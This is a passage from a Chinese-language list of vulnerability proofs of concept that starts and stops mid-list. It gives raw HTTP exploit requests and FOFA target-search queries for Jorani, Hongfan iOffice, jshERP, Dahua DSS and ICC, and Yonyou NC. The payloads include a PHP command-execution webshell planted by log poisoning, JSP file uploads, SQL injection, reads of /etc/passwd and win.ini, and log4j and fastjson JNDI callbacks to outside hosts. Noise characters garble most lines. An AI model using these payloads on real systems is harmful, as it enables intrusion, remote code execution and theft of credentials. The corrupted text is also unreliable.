Pragma: no-cache8 O! A# ^2 I& X/ }7 X5 D$ p
Cache-Control: no-cache# \4 d- ]6 P d! i
Upgrade-Insecure-Requests: 1
* d* ^' P, k8 i' n' @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
' d% S% y( g9 z3 d$ q/ ?5 Q; U6 q* C8 rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
^2 W% M! O" S0 gAccept-Encoding: gzip, deflate
5 t- F9 [$ y, {3 SAccept-Language: zh-CN,zh;q=0.9,en;q=0.8& `* L, G1 T$ V: W; f6 J' M8 W: K
Connection: close
3 w( l- {- I, l" n, u# w' [' f3 G/ I* E
$ z6 D+ G+ Y9 [" N r6 ]$ O
12. Jorani < 1.0.2 远程命令执行( O- F/ [5 x, Q# N
FOFA:title="Jorani"3 |9 O8 ?3 R# B
第一步先拿到cookie$ u1 O8 H# ^* i
GET /session/login HTTP/1.1$ D- p3 K. P% @4 x, O
Host: 192.168.190.30
- E! {1 S! X4 }1 YUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.364 x6 d4 f9 R( Q; W% V9 x5 V4 G/ H- ]6 V7 E
Connection: close
7 R6 F7 D: x; C4 I5 a# G- Z3 UAccept-Encoding: gzip: H5 T$ [% y; a% k) N* U
5 U$ p: N6 r: P0 C+ V; ~
& I- k" e1 H0 j7 H" H8 u响应中csrf_cookie_jorani用于后续请求
. q' R( J6 p/ l; K( i% L$ SHTTP/1.1 200 OK# K9 n p% Y, K; A1 f" J0 { e: |
Connection: close, R* p7 z8 P6 Q6 c) U, y7 _( l3 |
Cache-Control: no-store, no-cache, must-revalidate2 S/ l8 n( m- R0 Z) u( `
Content-Type: text/html; charset=UTF-8 {) q9 ?. d1 B8 y; T* W# F% l4 ^1 a
Date: Tue, 24 Oct 2023 09:34:28 GMT
& |: z9 Z0 t5 p4 p& J: c Z, QExpires: Thu, 19 Nov 1981 08:52:00 GMT7 @& M$ W9 n' b
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT1 f9 ~/ H1 @# I b9 ]1 K& K! Q
Pragma: no-cache( q; L) ]( ]: y, S2 M6 s: C
Server: Apache/2.4.54 (Debian)
' g9 h% O5 R t; aSet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/8 s4 p9 g& ?1 `! F
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
7 B1 c$ i- U! r, }5 v* g& }Vary: Accept-Encoding
/ I! l$ E# H' T2 g4 ]! y2 c1 O% v' k- F
" ?2 P: v5 F9 B6 l7 g. \POST请求,执行函数并进行base64编码' }0 R& W3 y3 G1 U9 G W
POST /session/login HTTP/1.1! q- W# X& a9 D, K. }, B1 ?0 ]
Host: 192.168.190.30
3 K7 L% T6 S+ ]/ ]* y: Y9 `/ qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
% e# H6 k% P% \, k& v7 fConnection: close$ `6 D4 @# ~9 v) _
Content-Length: 252
' s5 |5 U) y! G2 HContent-Type: application/x-www-form-urlencoded
0 K1 a1 _3 C0 uCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r+ O. @. V( \$ P
Accept-Encoding: gzip
% E1 E. ^$ A, W$ M3 n- ]6 i$ r4 o( t3 o& D! L0 q; P/ b8 I
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
! Q5 {" i! m& k) K' E) z4 I
; Z& t1 S$ N D: d* s- f p6 n1 M! M: I, y7 L/ z6 _
; B4 V k& H/ _$ X K8 G) X: T向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
6 l$ Q9 ^% p$ GGET /pages/view/log-2023-10-24 HTTP/1.1. r$ A7 H* n5 A) [
Host: 192.168.190.30$ u" U5 p+ H) c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
! T& y. u- p: H$ Z- E. f0 u; cConnection: close
, d, v9 J( c1 i! Y9 N+ ECookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
7 ^% G K9 g e( v( g( A' a% W3 OK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=# b2 X% B# |4 ~ P
X-REQUESTED-WITH: XMLHttpRequest4 h2 J/ L, B, ^6 @+ B
Accept-Encoding: gzip& j) r5 I4 C# q- P2 f
' P: D0 S5 A# x( `' {/ ^
9 d3 v4 E, Q/ ^0 G' F/ n+ ]1 n) Z6 N13. 红帆iOffice ioFileDown任意文件读取
; n: i- f, h7 H5 FFOFA:app="红帆-ioffice"7 u: J, e' O! v0 z& s, ~% E
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.11 f4 J3 g! ~6 k- q6 S
Host: x.x.x.x: g, K0 Q9 O+ U
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36. K+ ~# d0 X/ h" H
Connection: close. S! A1 f9 j, x$ x. v$ t
Accept: */*
/ U# U) f' s) B3 g b' i. bAccept-Encoding: gzip$ h7 i; W9 m7 D( v& q
. } f6 z! u2 q. x$ z: O8 y. ^' B' b) K4 p
14. 华夏ERP(jshERP)敏感信息泄露7 h t5 q& M+ F2 U+ i
FOFA:body="jshERP-boot", T+ j' l& U. f3 r# Z
泄露内容包括用户名密码
2 T y t8 `+ u7 J$ G7 ?! UGET /jshERP-boot/user/getAllList;.ico HTTP/1.1
) F" p, ?+ U8 N0 IHost: x.x.x.x7 C& k1 A7 T8 R/ g. o
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
: I3 o6 y" n& `4 G4 qConnection: close
% e( h4 Y) g2 l, D1 t; EAccept: */*
' K. b; |! r' a8 |3 mAccept-Language: en
% Q u) t, W' xAccept-Encoding: gzip1 A/ W, l* u! s4 Q3 p
1 M1 J) O' T. P0 V
, Z5 Y- d6 r. r9 W15. 华夏ERP getAllList信息泄露
1 J/ J8 B8 U: D/ S2 a8 ~0 BCVE-2024-0490
- Q' a9 V" e H+ D6 dFOFA:body="jshERP-boot"; O7 r3 _. K8 l
泄露内容包括用户名密码
3 Z, j! ] D8 i0 y4 k6 y# `* K. PGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
+ L0 D6 r t7 d3 IHost: 192.168.40.130:100
( ` L3 }. C8 v9 \5 D+ uUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.360 c. o4 l1 p' C: Y7 b! N: L" b
Connection: close; S: P! S' x5 X' j1 a/ d" F
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8) x* {1 F6 ?% M% z4 c4 z5 |
Accept-Language: en
6 F: @8 X8 F' ~ t# r5 Vsec-ch-ua-platform: Windows! D( C) Q& w3 l/ @$ W6 v7 C7 k
Accept-Encoding: gzip
$ Q5 ~7 d1 Q" x* i8 c) `; W1 V6 n" R
; g8 q7 f- W x5 t7 u* o& Q$ u
16. 红帆HFOffice医微云SQL注入
3 u ~ z9 ?& S% i7 v0 ]7 ZFOFA:title="HFOffice"" P: u( Q4 N9 f! r2 l
poc中调用函数计算1234的md5值
% h; z2 p6 i7 B% ]7 ~; fGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.13 Z/ e7 A% g7 m! X; V
Host: x.x.x.x
, |& @. V; u/ R, y9 \/ PUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
! E$ B' x0 |* ZConnection: close
- y! L5 n% M' [9 U# A6 jAccept: */*' A, T9 \) C0 N6 u9 Q! a
Accept-Language: en
7 ]# O& |4 J2 V1 K& rAccept-Encoding: gzip5 l8 P$ e" n1 \
3 i: b+ s1 w5 H: Z0 z2 Y
/ w) T. X7 J# }17. 大华 DSS itcBulletin SQL 注入4 S6 |! C. e2 N0 O: m% Z
FOFA:app="dahua-DSS". ?) I. H0 T, r( r2 f" o. R
POST /portal/services/itcBulletin?wsdl HTTP/1.17 B2 Y" a0 x0 I& d
Host: x.x.x.x
) N4 W9 @: L9 M. aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15; m' \5 b8 v7 B; g4 |' m
Connection: close
r" W; _& ?, P/ r3 k; vContent-Length: 345
R3 F8 i9 D9 [9 ]+ y/ b( M# w; c Z. ^Accept-Encoding: gzip, x+ l0 v7 e- Z
( y1 y }5 c9 Y$ A3 f, k
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
0 ?4 u' S, _+ A7 K, f<s11:Body>
; W0 G0 W* u% S' v' r( \" V <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
, F ~# d& @2 n. g( b <netMarkings>) j7 L0 ]7 M T! v5 T" p
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
, z9 c b; v, k$ {- E3 } </netMarkings>
7 Y/ j0 C* l$ C% v </ns1:deleteBulletin>
( \" d$ D0 W! X0 h7 e F. K7 u+ \3 I </s11:Body>" R! l1 j( }8 u3 U+ K) C: {2 D
</s11:Envelope>
& N1 o; Q# _4 l- Q: Q+ A! r: o I7 ]0 r# N4 V
8 b3 \1 V0 f' ^) E% ^* T; t, R* b18. 大华 DSS 数字监控系统 user_edit.action 信息泄露( m6 `. g1 H1 g' c4 L6 n
FOFA:app="dahua-DSS"
. H, W9 Q7 Z7 B/ {) fGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
) Z+ F* v) ^# C2 @+ q7 }3 pHost: your-ip0 A5 v- I4 \( F8 i; K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
6 c! Q1 c) Z( \* A7 GAccept-Encoding: gzip, deflate
5 e, O) y: ?8 B9 n- L M) YAccept: */*2 q+ t; Z, C4 C7 y
Connection: keep-alive
% _6 J9 B2 \5 l. L7 L3 A, L
7 X- q- p' m3 F: {; S9 ?
; }* Q! L) r: I- X. ~) p) }
0 R1 L$ Z' o3 y9 h19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入. d* L9 L5 y* X3 s
FOFA:app="dahua-DSS"
& X; ^9 k5 \( p* Y& c: Y2 K+ e' zGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1. F/ t/ y) ]' E: J
Host:7 n8 s: L# }$ K, Z
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36' A5 {, R. S, c* j1 ^
Accept-Encoding: gzip, deflate+ s2 g, T$ | C# ? W4 J/ i% U
Accept: */*$ D6 u% ~0 q$ q; f
Connection: keep-alive
' N! P$ M7 w$ V6 N1 _* o) l9 L
& D, i$ I M$ m6 I5 @# H7 h L" s+ e% n; @( m5 k3 q
20. 大华ICC智能物联综合管理平台任意文件读取
5 m5 f5 s0 z6 a+ f8 l* H3 vFOFA:body="*客户端会小于800*"6 P6 U, v! h" S! L, T
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
; O6 N9 u+ h- d) JHost: x.x.x.x
4 v/ ~4 S/ Y5 u, r( }/ o2 z2 \) [User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
2 A; j2 _! A' O, n0 N N( YConnection: close5 I7 F/ F& Z* g$ Q) K' i; o
Accept: */*
# Z7 j- P$ {+ T5 Y& Q: pAccept-Language: en
5 r2 o1 e' S: b6 G1 M, \Accept-Encoding: gzip9 x$ P7 h+ ^1 @" S/ C
6 U9 f' S6 N# j; V1 D: G% b9 G$ P z1 m! ~: I
21. 大华ICC智能物联综合管理平台random远程代码执行' }, i7 p* e- f+ {# T
FOFA:icon_hash="-1935899595"
/ }- J& X6 [- V LPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
! a" c& g T* {; T% z! U5 g* eHost: x.x.x.x; h; ~9 W1 C( J- H9 j7 w+ B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
$ ]- q; c! R b" b, NContent-Length: 161
7 n& @9 A6 E2 Q- t0 u* @Accept-Encoding: gzip
- Q; ^0 ?' [) y3 l( }3 g. X- WConnection: close
5 P5 s; f. B/ f. u% ?6 o: eContent-Type: application/json;charset=utf-8* j# W6 H2 J8 x5 c- ?' K' {
; t* y( D' C) l8 }
{3 |% ?# Z% z: b. a- o0 w9 Z% ~5 _& [2 }
"a":{3 k, t1 H5 R3 N. u0 J0 L1 [
"@type":"com.alibaba.fastjson.JSONObject",
# x: y7 I' q9 x! O {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
2 B* G4 t; A8 r! k/ M }""
* }4 x$ d# `$ S5 H- w}* {) k& i8 b8 `6 q" d
. @" j$ @- ~5 B \; [1 K3 s" B; T% b/ Q7 y4 z4 e! U. Z
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
1 A8 c$ \0 c2 E# J" v% F+ i7 eFOFA:icon_hash="-1935899595"" }" B: e5 J( A4 g$ z( l# h2 C
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
v8 ?5 B9 r1 Z5 y4 t! AHost: your-ip5 T0 k/ ^2 |# B0 t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
8 y+ b) z O8 ?. dContent-Type: application/json;charset=utf-8
{* V7 K0 ~2 I' p K9 Q2 b. r- _ Q, Q0 |$ p: H
{: z1 g9 s. I; b- h
"loginName":"${jndi:ldap://dnslog}"
" ~- T, V3 r. S/ ?, }9 U}
3 e. U3 @: t- K/ w1 q" P5 m% s- }. t: I$ \9 w; w% z P
1 W. m$ I5 d" Z1 P( \6 z# |: S# T" o/ A2 F! `0 K" R, r
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
$ _" w: S! d8 a eFOFA:icon_hash="-1935899595"5 `7 c, N- K) ^& D) w( b6 }- \; a
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
( @$ \' B/ \9 k) G9 S h* fHost: your-ip
2 M! l3 [' F& `6 @4 R. c+ E4 d5 PUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 R0 [6 k3 [4 s4 P; k l6 q) NContent-Type: application/json;charset=utf-8+ N/ W$ t W! F. [
Accept-Encoding: gzip
8 X$ ]9 S$ N2 k5 j' I# u) Y+ v( q2 ^2 |Connection: close( {& d+ d, l5 I+ W9 D6 w. C2 |
+ R( b; [6 g4 C% ^; m3 W
{ M1 @1 }5 I3 u% d. r
"a":{
8 X& \# i2 o, y3 c "@type":"com.alibaba.fastjson.JSONObject",
1 o: M2 ~! }7 s/ ?. T) W {"@type":"java.net.URL","val":"http://DNSLOG"}
+ M) G' u3 }. h% f4 q/ m }""1 U" P0 g2 { L7 [. J" w
}1 l5 j; K8 H! s- c1 Q9 J
5 W: q6 }* K5 g. V6 Y) A! X: n! V9 ~
24. 用友NC 6.5 accept.jsp任意文件上传
8 T2 O0 J7 T P! B, }, ~) F) w* XFOFA:icon_hash="1085941792"8 n0 r3 I' ^, h% _
POST /aim/equipmap/accept.jsp HTTP/1.1
' }+ o0 x+ H) P) BHost: x.x.x.x1 J9 _7 N+ B# ]& d/ R/ W1 [ b
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36; t* U, b! q- [9 S
Connection: close4 H. K0 ~; |, E
Content-Length: 449
3 B% C/ z/ E9 a6 D3 U; jAccept: */*, A8 i! |+ ~0 u6 j" ~* X
Accept-Encoding: gzip9 a5 X2 H5 ]& ]" y% D6 x1 I i
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc% g& X1 m' S6 u) u* L, z: W6 ~1 @
- E+ h0 w, p) j-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc) j% ~) K+ J. W' }; l2 G7 p
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
6 {5 Z1 o% ] Y) V) ?Content-Type: text/plain
9 X" N* A8 e6 U1 f0 T& U& r% u" `0 g4 }* l, j. w. T( ^8 o
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>. W7 d9 u: B. t7 J" n" A0 _) ^- Q
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
+ |: d' X9 L7 s2 B- FContent-Disposition: form-data; name="fname"
7 b$ K3 z1 D. ]3 u6 l! b; J, ]' t; n8 t# m! H
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp6 s- {: K1 k/ _9 G( {0 L: z* j
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--, ~: S6 B/ b1 K
: ^& C+ h: d7 H1 ]3 m+ [# J J, J- V* [9 K9 y
25. 用友NC registerServlet JNDI 远程代码执行
4 k4 l) _5 H* R7 N, MFOFA:app="用友-UFIDA-NC"
+ I! [3 W. t$ D R/ a8 U2 {POST /portal/registerServlet HTTP/1.1
( Z( b) m: @; R8 ]# x( S4 ~0 O: j! hHost: your-ip8 S1 x) h. u6 B1 N0 R: H# E! c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
* T. F% k* \( [7 r4 ]4 z5 zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9/ f) r, p; m! N" k3 j5 q; q' C
Accept-Encoding: gzip, deflate4 b9 T: t( p% t) n0 O
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.69 i% p D3 n" V" c: M
Content-Type: application/x-www-form-urlencoded
A4 Z. Y9 K* ^; v
$ J5 |" z% N, Y6 b' V2 rtype=1&dsname=ldap://dnslog
$ C& k$ B' s0 _9 z
& P0 f& |. Z; n: }/ [* m
: _) r! E3 `5 t9 A O- |% s' Y6 U6 `6 e
$ A6 `6 V' [4 x, a4 }26. 用友NC linkVoucher SQL注入- [# z8 V3 o- n
FOFA:app="用友-UFIDA-NC"
% P6 `& r+ q- v. V- j5 _GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1' R* M9 x- t. b0 @) v! D8 O9 A4 W
Host: your-ip
/ ^/ u7 L4 Y' p) {5 L7 MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.362 |" K% d' P# I; [& j* ~ o& h. a9 F
Content-Type: application/x-www-form-urlencoded
& m A& A u/ I& RAccept-Encoding: gzip, deflate
; @, h; c5 v! e( ?8 `2 RAccept: */*8 Y# _6 V" E. F7 n7 P. U s0 J4 x
Connection: keep-alive2 }4 _ A: P( X. |4 x
5 \0 Y7 R5 t) R( Z; w
5 G6 F( L- U. j) f" V" Q27. 用友 NC showcontent SQL注入
! f: X, `0 a% x' mFOFA:icon_hash="1085941792"
5 a- d3 T; }* H- e$ o( JGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
# k, R% h: ?5 W. I6 A/ B6 zHost: your-ip+ N4 s5 h; @3 i) i' r h& O& i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.367 f% j8 S6 M6 f+ `5 P
Accept-Encoding: identity
6 c; Z" A6 p5 ?3 t$ u, qConnection: close ~. y4 Y* Q9 `* l% P
Content-Type: text/xml; charset=utf-8
* W; |# Z" F: P, {7 s# o, h8 W
! ^& L, p+ I' E& ^1 p5 B& e$ ^5 G. z
28. 用友NC grouptemplet 任意文件上传( r. a9 u" J: }$ N5 U( H
FOFA:icon_hash="1085941792"
# h8 P" V$ K. y y5 {8 vPOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
1 Q( s. M* J. p/ f/ SHost: x.x.x.x5 s- D: w& B9 E( o4 y2 `- i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
) p: C. g4 Z2 i2 Z4 Y- I3 C( aConnection: close
: E+ }3 C- \+ q% tContent-Length: 268
9 U' j5 Y" ]; {/ x% rContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk5 j/ G) ^+ S3 Z3 f z5 v
Accept-Encoding: gzip
0 T7 E/ A; A5 ~' T; {( `& f
9 U" j. R9 ^7 T7 V7 }! u------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
# o* A; b( H- g8 YContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"/ H: `( C6 F/ H/ c ?% ~
Content-Type: application/octet-stream8 _( m3 B+ s4 ^+ g
) Y3 u* d! ^8 M<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%> X( F H% R/ m1 z
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--2 a1 Z' p# p5 a8 G7 Z/ U
. S4 e" x9 H2 s# z5 R7 W {+ Q6 g4 ]. {0 C F X, l
/uapim/static/pages/nc/head.jsp
$ a& ]! K" z( \
2 d, @, v& i" K4 G1 j t) ?29. 用友NC down/bill SQL注入
+ A" H2 x; G1 S1 ZFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
, Z. S1 A' L$ [1 q* c+ A" K3 CGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
5 K% ?9 r+ x" THost: your-ip/ A1 ^ n$ d$ q0 l( N3 z. y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 d: \ N+ _- S' fContent-Type: application/x-www-form-urlencoded
0 K) o( O7 b6 k: oAccept-Encoding: gzip, deflate1 b) E8 i, Y' o, s+ Q
Accept: */*
7 a# d/ l, v* R/ ]Connection: keep-alive
# @ }) @5 e4 u Y# q: \' P" `2 v' q, k
+ q o3 g9 q9 w" B- {. ~30. 用友NC importPml SQL注入
; y- Y% p+ P' @0 r9 i$ w2 z1 DFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"6 ^4 u5 K& d$ ]; \5 F
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
) Y l8 j. F3 u+ ~Host: your-ip
" k# u0 Y ^) o# c A- _8 DContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
( y" J4 l/ R0 rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.363 n$ e( |8 d: W; Q: S
Connection: close
& _: u0 f/ M" R! d: c0 m' g
4 f' Z$ {& z/ @4 h------WebKitFormBoundaryH970hbttBhoCyj9V
1 R- T M5 C3 j3 _# q* E- d6 dContent-Disposition: form-data; name="Filedata"; filename="1.jpg"
# s& }4 Y6 K2 J$ ^3 hContent-Type: image/jpeg5 @: A$ K2 C+ V* f+ D" r' E+ e
------WebKitFormBoundaryH970hbttBhoCyj9V--
0 B' k. h- I$ V3 _: N% J8 Z; ~1 ~! s$ h
" R8 T {+ f% I3 P j
0 | b0 q4 C7 f: E31. 用友NC runStateServlet SQL注入7 F5 p9 u, Q4 Q! \: _ O
version<=6.5. r8 P4 j2 t4 F2 z; Z
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"9 c& e4 f7 e* v; s, _1 Z
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
# s" A w* p! a ]$ jHost: host) v/ t+ k% Y$ B6 S: ~7 t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36& R- }6 F7 @- s" k/ w
Content-Type: application/x-www-form-urlencoded
/ G6 e u/ `& a5 H( ^; U4 f( E8 a7 q6 |: N
7 Q4 \ P; X0 R32. 用友NC complainbilldetail SQL注入$ q- g. Q& Z5 Q1 m) f
version= NC633、NC65: z: H, Y X. t1 {0 h# R% i' i2 `
FOFA:app="用友-UFIDA-NC"
; a. ~% }& m. G3 MGET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
. \ m$ ?! z; cHost: your-ip/ J( L/ U0 R& d6 o( C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
, w% J! e, |) P; Y( JContent-Type: application/x-www-form-urlencoded, q& D8 S$ s4 i, u: p: w# b9 R2 ~
Accept-Encoding: gzip, deflate. E4 _8 ^/ ~3 I8 U+ p2 P
Accept: */*$ R- X! B3 h' @/ D( V
Connection: keep-alive7 e, |! D; K, Y/ R! n" M' D
( K- b9 J" s+ e
' z3 Z& M: Q3 y4 }# }( Y- P
33. 用友NC downTax/download SQL注入
6 u# \0 x0 b1 R- ?( }6 e- {3 `version:NC6.5FOFA:app="用友-UFIDA-NC"
9 g* u2 |& A4 T5 LGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.17 c% a: y% k' k( A/ u) M h
Host: your-ip
2 x5 P- V. p# Y0 X* d8 |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
& N- B1 J7 k8 i( s- ~9 T; @Content-Type: application/x-www-form-urlencoded! E) ^2 C( H1 M' p8 y1 b; [$ Y
Accept-Encoding: gzip, deflate
; E& F, j6 n4 V6 t) q( T, W% d) l/ }Accept: */*
5 L0 p, O! P/ p* K, n/ F7 h2 ?( OConnection: keep-alive
- h+ E9 D5 b5 {9 s j$ o) x( P
0 A; M& o h% n4 Y2 T; g3 I7 _1 ?# D% s: p4 S/ q# G
34. 用友NC warningDetailInfo接口SQL注入
8 l2 G9 W$ C8 R3 T, GFOFA:app="用友-UFIDA-NC"* A1 Y& B, ?& B, c0 E6 _! P: Q- ~2 | }
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1; a0 P3 b/ S1 ]* Q) Y' y
Host: your-ip
8 }# w% X7 g1 P% L9 G$ KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
6 R: w& V9 g7 N3 |Content-Type: application/x-www-form-urlencoded+ B7 A% {: l' G- T0 k
Accept-Encoding: gzip, deflate
8 U D8 m. J; Y- F5 J# HAccept: */** g$ `. I2 _/ ~
Connection: keep-alive
, T$ q# X: ]' y8 d& r, |$ L; v" L9 w" y5 j- M/ w& c( Y+ S. P
( ]) |3 c" H7 U6 S35. 用友NC-Cloud importhttpscer任意文件上传
3 e- y" F3 m8 m4 A' U7 }FOFA:app="用友-NC-Cloud"- u0 A$ J# U7 T+ K1 p9 w% c. Z
